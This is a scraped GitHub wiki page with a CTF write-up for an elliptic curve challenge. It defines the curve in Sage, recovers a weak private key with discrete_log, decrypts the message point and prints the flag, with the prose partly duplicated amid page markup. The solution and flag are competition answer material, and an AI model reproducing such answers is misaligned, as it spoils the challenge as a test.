3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Recon</h2>"large ... private key" - this means some sort of brute force might be involved :)opening the file ecc.txt we can quickly see coordinates which indicates that it's an Elliptic Curve Cryptography challenge and that's exactly what the file's name stands for !<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Execution</h2>Now this challenge is pretty much a straight forward elliptic curve cryptography, using our great friend sagemath we define what we are given above as shown below :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="a = 3820149076078175358 My slingshotter cousin Maneo just discovered a new cryptography scheme and has been raving about it since. I was trying to tell him the importance of setting a large, random private key, but he wouldn't listen. Guess security isn't as important as how many thousands of credits he can win in his next race around the system. I've recovered a message sent to him detailing the finish line. Can you decrypt the message to find the coordinates so I can beat him there? I'll give you a percentage of the score! Enter flag as shctf{x_y}, where x & y are the coordinates of the decrypted point. Hint: You may wish to consult the great Sage of Crypto for help on this challenge. ecc.txt Now this challenge is pretty much a straight forward elliptic curve cryptography, using our great friend sagemath we define what we are given above as shown below : b = 1296618846080155687 p = 11648516937377897327 E = EllipticCurve(GF(p), [a,b]) G = E(4612592634107804164, 6359529245154327104) PubKey = E(9140537108692473465, 10130615023776320406)">a = 3820149076078175358 b = 1296618846080155687 p = 11648516937377897327 E = EllipticCurve(GF(p), [a,b]) G = E(4612592634107804164, 6359529245154327104) PubKey = E(9140537108692473465, 10130615023776320406)</div>As we know the decypted message in the elliptic curve cryptography is just M = Cb-(d*Ca) where d is the private key and Cb,Ca being two points on our elliptic curve, we go ahead and define these latters first:<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Ca = E(7657281011886994152, 10408646581210897023) As we know the decypted message in the elliptic curve cryptography is just M = Cb-(d*Ca) where d is the private key and Cb,Ca being two points on our elliptic curve, we go ahead and define these latters first: Cb = E(5414448462522866853, 5822639685215517063)">Ca = E(7657281011886994152, 10408646581210897023) Cb = E(5414448462522866853, 5822639685215517063)</div>Now for the fun part ! we need to recover the private key via a discrete_log brute force attack so we set that up :d = G.discrete_log(PubKey)Defining our message is just the mathematical expression :M = Cb-(d*Ca)Perfect ! now our decrypted message is ready so let's go ahead and print it out :print(M)looks like we get some coordinates : (8042846929834025144 : 11238981380437369357 : 1)and since the flag format is shctf{x_y} we officially found the flag !<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag</h1>shctf{8042846929834025144_11238981380437369357} Now for the fun part ! we need to recover the private key via a discrete_log brute force attack so we set that up : d = G.discrete_log(PubKey) Defining our message is just the mathematical expression : M = Cb-(d*Ca) Perfect ! now our decrypted message is ready so let's go ahead and print it out : print(M) looks like we get some coordinates : (8042846929834025144 : 11238981380437369357 : 1)and since the flag format is shctf{x_y} we officially found the flag ! shctf{8042846929834025144_11238981380437369357} </div> </div></div></div> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/wiki-b72b6de22521.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wiki-1423a5c9ebf5.js"></script> <title>Space Heroes CTF : Information Paradox · not1cyyy/CTF-Writeups Wiki · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/wiki/:id(.:format)"> <meta name="current-catalog-service-hash" content="27690012a2eb28b75d0bacab0f2c11870266e8db9e019fa71fea812b82397bd6"> <meta name="request-id" content="8181:12398:1A9E0857:1B6EB781:64121B98" data-pjax-transient="true"/><meta name="html-safe-nonce" content="b2389d972c1bd5cc51e8ff9a3fcf6b52cfa0d5cf76c38745b4ac511de212f630" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4MTgxOjEyMzk4OjFBOUUwODU3OjFCNkVCNzgxOjY0MTIxQjk4IiwidmlzaXRvcl9pZCI6IjIzNTI5NTk0OTM2MTk0NTY5MjAiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="a33303a624c9a6fddf3aa560a600b79f212e94ad7e507152e14e4de144e7564b" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:481769760" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository" data-turbo-transient="true" /> <meta name="selected-link" value="repo_wiki" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/wiki/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Space Heroes CTF : Information Paradox" /><meta name="twitter:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta property="og:image:alt" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="Space Heroes CTF : Information Paradox" /><meta property="og:url" content="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Information-Paradox" /><meta property="og:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="go-import" content="github.com/not1cyyy/CTF-Writeups git https://github.com/not1cyyy/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="101048320" /><meta name="octolytics-dimension-user_login" content="not1cyyy" /><meta name="octolytics-dimension-repository_id" content="481769760" /><meta name="octolytics-dimension-repository_nwo" content="not1cyyy/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="481769760" /><meta name="octolytics-dimension-repository_network_root_nwo" content="not1cyyy/CTF-Writeups" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" 